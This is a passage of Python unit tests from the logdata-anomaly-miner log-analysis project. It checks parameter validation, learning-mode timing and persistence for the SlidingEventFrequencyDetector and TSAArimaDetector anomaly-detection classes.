self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, ignore_list="") self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, ignore_list=b"Default") self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, ignore_list=True) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, ignore_list=123) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, ignore_list=123.3) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, ignore_list={"id": "Default"}) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, ignore_list=()) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, ignore_list=set()) SlidingEventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], 300, ignore_list=[]) SlidingEventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], 300, ignore_list=None) self.assertRaises(ValueError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, constraint_list=[""]) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, constraint_list="") self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, constraint_list=b"Default") self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, constraint_list=True) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, constraint_list=123) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, constraint_list=123.3) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, constraint_list={"id": "Default"}) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, constraint_list=()) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, constraint_list=set()) SlidingEventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], 300, constraint_list=[]) SlidingEventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], 300, constraint_list=None) self.assertRaises(ValueError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, learn_mode=True, stop_learning_time=-1) self.assertRaises(ValueError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, learn_mode=True, stop_learning_time=0) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, learn_mode=True, stop_learning_time=b"Default") self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, learn_mode=True, stop_learning_time="123") self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, learn_mode=True, stop_learning_time={"id": "Default"}) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, learn_mode=True, stop_learning_time=["Default"]) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, learn_mode=True, stop_learning_time=[]) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, learn_mode=True, stop_learning_time=()) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, learn_mode=True, stop_learning_time=set()) SlidingEventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], 300, learn_mode=True, stop_learning_time=100) SlidingEventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], 300, learn_mode=True, stop_learning_time=100.22) self.assertRaises(ValueError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, learn_mode=True, stop_learning_no_anomaly_time=-1) self.assertRaises(ValueError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, learn_mode=True, stop_learning_no_anomaly_time=0) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, learn_mode=True, stop_learning_no_anomaly_time=b"Default") self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, learn_mode=True, stop_learning_no_anomaly_time="123") self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, learn_mode=True, stop_learning_no_anomaly_time={"id": "Default"}) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, learn_mode=True, stop_learning_no_anomaly_time=["Default"]) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, learn_mode=True, stop_learning_no_anomaly_time=[]) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, learn_mode=True, stop_learning_no_anomaly_time=()) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, learn_mode=True, stop_learning_no_anomaly_time=set()) SlidingEventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], 300, learn_mode=True, stop_learning_no_anomaly_time=100) SlidingEventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], 300, learn_mode=True, stop_learning_no_anomaly_time=100.22) self.assertRaises(ValueError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, learn_mode=True, stop_learning_time=100, stop_learning_no_anomaly_time=100) self.assertRaises(ValueError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, log_resource_ignore_list=["/tmp/syslog"]) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, log_resource_ignore_list="") self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, log_resource_ignore_list=b"Default") self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, log_resource_ignore_list=True) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, log_resource_ignore_list=123) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, log_resource_ignore_list=123.22) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, log_resource_ignore_list={"id": "Default"}) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, log_resource_ignore_list=()) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, log_resource_ignore_list=set()) SlidingEventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], 300, log_resource_ignore_list=["file:///tmp/syslog"]) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/analysis/TSAArimaDetectorTest.py000066400000000000000000001407421500476301700301200ustar00rootroot00000000000000import unittest import time from datetime import datetime from aminer.analysis.TSAArimaDetector import TSAArimaDetector from aminer.analysis.EventTypeDetector import EventTypeDetector from aminer.input.LogAtom import LogAtom from aminer.parsing.MatchElement import MatchElement from aminer.parsing.ParserMatch import ParserMatch from unit.TestBase import TestBase, DummyFixedDataModelElement, DummyFirstMatchModelElement, DummyMatchContext from aminer.AminerConfig import DEFAULT_PERSISTENCE_PERIOD from aminer.analysis.EventCorrelationDetector import EventCorrelationDetector, set_random_seed import random class TSAArimaDetectorTest(TestBase): """Unittests for the TSAArimaDetector.""" def test1receive_atom(self): """ This test case checks the normal detection of new sequences. The ESD is used to detect value sequences of length 2 and uses one id path to cope with interleaving sequences, i.e., the sequences only make sense when logs that contain the same id are considered. Test if log atoms are processed correctly and the detector is learning (learn_mode=True) and stops if learn_mode=False. Test if stop_learning_time and stop_learning_no_anomaly_timestamp are implemented properly. """ etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) tad = TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, output_logline=False) self.run_tad_test(tad, etd, self.data) # target_path_list etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler], target_path_list=["/model/value"]) tad = TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=["/model/value"], learn_mode=True, output_logline=False) self.run_tad_test(tad, etd, self.data) # stop_learning_time t = time.time() log_atom1 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t, None) log_atom2 = LogAtom(b"b", ParserMatch(MatchElement("/value", b"b", b"b", None)), t+3, None) log_atom3 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t+7, None) tad = TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=["/model/value"], learn_mode=True, stop_learning_time=100) self.assertTrue(tad.receive_atom(log_atom1)) log_atom1.atom_time = t + 99 self.assertTrue(tad.receive_atom(log_atom1)) self.assertTrue(tad.learn_mode) log_atom1.atom_time = t + 101 self.assertTrue(tad.receive_atom(log_atom1)) self.assertFalse(tad.learn_mode) # stop_learning_no_anomaly_time tad = TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=["/model/value"], learn_mode=True, stop_learning_no_anomaly_time=100) log_atom1.atom_time = t self.assertTrue(tad.receive_atom(log_atom1)) log_atom1.atom_time = t + 100 self.assertTrue(tad.receive_atom(log_atom1)) self.assertTrue(tad.learn_mode) log_atom2.atom_time = t + 100 self.assertTrue(tad.receive_atom(log_atom2)) self.assertTrue(tad.learn_mode) log_atom1.atom_time = t + 200 self.assertTrue(tad.receive_atom(log_atom3)) self.assertTrue(tad.learn_mode) log_atom1.atom_time = t + 201 self.assertTrue(tad.receive_atom(log_atom1)) self.assertFalse(tad.learn_mode) def test2do_timer(self): """Test if the do_timer method is implemented properly.""" etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) tad = TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd) t = time.time() tad.next_persist_time = t + 400 self.assertEqual(tad.do_timer(t + 200), 200) self.assertEqual(tad.do_timer(t + 400), DEFAULT_PERSISTENCE_PERIOD) self.assertEqual(tad.do_timer(t + 999), 1) self.assertEqual(tad.do_timer(t + 1000), DEFAULT_PERSISTENCE_PERIOD) def test3persistence(self): """Test the do_persist and load_persistence_data methods.""" etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) tad = TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, output_logline=False) self.run_tad_test(tad, etd, self.data) tad.do_persist() with open(tad.persistence_file_name, "r") as f: self.assertEqual(f.read(), '[[[]], [[[], [], []]], [[]], [[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]], [[], [], []], [1001]]') self.assertEqual(tad.time_window_history, [[]]) self.assertEqual(tad.prediction_history, [[[], [], []]]) self.assertEqual(tad.time_history, [[]]) self.assertEqual(tad.result_list, [[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]]) self.assertEqual(tad.time_trigger_list, [[], [], []]) self.assertEqual(tad.num_event_lines_ref, [1001]) tad.time_window_history = [] tad.prediction_history = [] tad.time_history = [] tad.result_list = [] tad.time_trigger_list = [] tad.num_event_lines_ref = [] tad.load_persistence_data() self.assertEqual(tad.time_window_history, [[]]) self.assertEqual(tad.prediction_history, [[[], [], []]]) self.assertEqual(tad.time_history, [[]]) self.assertEqual(tad.result_list, [[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]]) self.assertEqual(tad.time_trigger_list, [[], [], []]) self.assertEqual(tad.num_event_lines_ref, [1001]) other = TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True) self.assertEqual(other.time_window_history, tad.time_window_history) self.assertEqual(other.prediction_history, tad.prediction_history) self.assertEqual(other.time_history, tad.time_history) self.assertEqual(other.result_list, tad.result_list) self.assertEqual(other.time_trigger_list, tad.time_trigger_list) self.assertEqual(other.num_event_lines_ref, tad.num_event_lines_ref) def test4validate_parameters(self): """Test all initialization parameters for the detector. Input parameters must be validated in the class.""" etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, ["default"], etd) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, None, etd) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, "", etd) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, b"Default", etd) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, True, etd) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, 123, etd) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, 123.3, etd) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, {"id": "Default"}, etd) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, (), etd) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, set(), etd) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, waiting_time=-1) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, waiting_time=0) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, waiting_time=b"Default") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, waiting_time="123") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, waiting_time={"id": "Default"}) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, waiting_time=["Default"]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, waiting_time=[]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, waiting_time=()) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, waiting_time=set()) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, waiting_time=100) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, waiting_time=100.22) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_sections_waiting_time=-1) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_sections_waiting_time=0) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_sections_waiting_time=b"Default") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_sections_waiting_time="123") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_sections_waiting_time={"id": "Default"}) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_sections_waiting_time=["Default"]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_sections_waiting_time=[]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_sections_waiting_time=()) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_sections_waiting_time=set()) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_sections_waiting_time=100) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_sections_waiting_time=100.22) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_pause_interval_percentage=-1) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_pause_interval_percentage=1.1) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_pause_interval_percentage=b"Default") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_pause_interval_percentage="123") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_pause_interval_percentage={"id": "Default"}) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_pause_interval_percentage=["Default"]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_pause_interval_percentage=[]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_pause_interval_percentage=()) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_pause_interval_percentage=set()) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, acf_pause_interval_percentage=0) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, acf_pause_interval_percentage=0.5) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, acf_pause_interval_percentage=1) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_auto_pause_interval=b"True") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_auto_pause_interval="True") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_auto_pause_interval=123) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_auto_pause_interval=123.22) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_auto_pause_interval={"id": "Default"}) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_auto_pause_interval=["Default"]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_auto_pause_interval=[]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_auto_pause_interval=()) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_auto_pause_interval=set()) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, acf_auto_pause_interval=True) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_auto_pause_interval_num_min=-1) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_auto_pause_interval_num_min=0) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_auto_pause_interval_num_min=100.22) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_auto_pause_interval_num_min=b"Default") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_auto_pause_interval_num_min="123") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_auto_pause_interval_num_min={"id": "Default"}) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_auto_pause_interval_num_min=["Default"]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_auto_pause_interval_num_min=[]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_auto_pause_interval_num_min=()) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_auto_pause_interval_num_min=set()) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, acf_auto_pause_interval_num_min=100) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, build_sum_over_values=b"True") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, build_sum_over_values="True") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, build_sum_over_values=123) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, build_sum_over_values=123.22) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, build_sum_over_values={"id": "Default"}) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, build_sum_over_values=["Default"]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, build_sum_over_values=[]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, build_sum_over_values=()) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, build_sum_over_values=set()) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, build_sum_over_values=True) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_periods_tsa_ini=-1) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_periods_tsa_ini=0) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_periods_tsa_ini=100.22) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_periods_tsa_ini=b"Default") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_periods_tsa_ini="123") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_periods_tsa_ini={"id": "Default"}) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_periods_tsa_ini=["Default"]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_periods_tsa_ini=[]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_periods_tsa_ini=()) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_periods_tsa_ini=set()) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_periods_tsa_ini=100) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_division_time_step=-1) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_division_time_step=0) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_division_time_step=100.22) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_division_time_step=b"Default") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_division_time_step="123") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_division_time_step={"id": "Default"}) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_division_time_step=["Default"]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_division_time_step=[]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_division_time_step=()) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_division_time_step=set()) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_division_time_step=100) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha=-1) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha=1.1) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha=b"Default") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha="123") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha={"id": "Default"}) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha=["Default"]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha=[]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha=()) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha=set()) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, alpha=0) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, alpha=0.5) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, alpha=1) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha_bt=-1) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha_bt=1.1) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha_bt=b"Default") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha_bt="123") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha_bt={"id": "Default"}) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha_bt=["Default"]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha_bt=[]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha_bt=()) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha_bt=set()) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, alpha_bt=0) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, alpha_bt=0.5) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, alpha_bt=1) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_min_time_history=-1) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_min_time_history=0) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_min_time_history=b"Default") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_min_time_history="123") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_min_time_history={"id": "Default"}) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_min_time_history=["Default"]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_min_time_history=[]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_min_time_history=()) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_min_time_history=set()) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_max_time_history=-1) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_max_time_history=0) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_min_time_history=30, num_max_time_history=20) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_max_time_history=b"Default") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_max_time_history="123") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_max_time_history={"id": "Default"}) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_max_time_history=["Default"]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_max_time_history=[]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_max_time_history=()) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_max_time_history=set()) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_min_time_history=20, num_max_time_history=100) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_results_bt=-1) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_results_bt=0) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_results_bt=100.22) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_results_bt=b"Default") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_results_bt="123") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_results_bt={"id": "Default"}) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_results_bt=["Default"]) 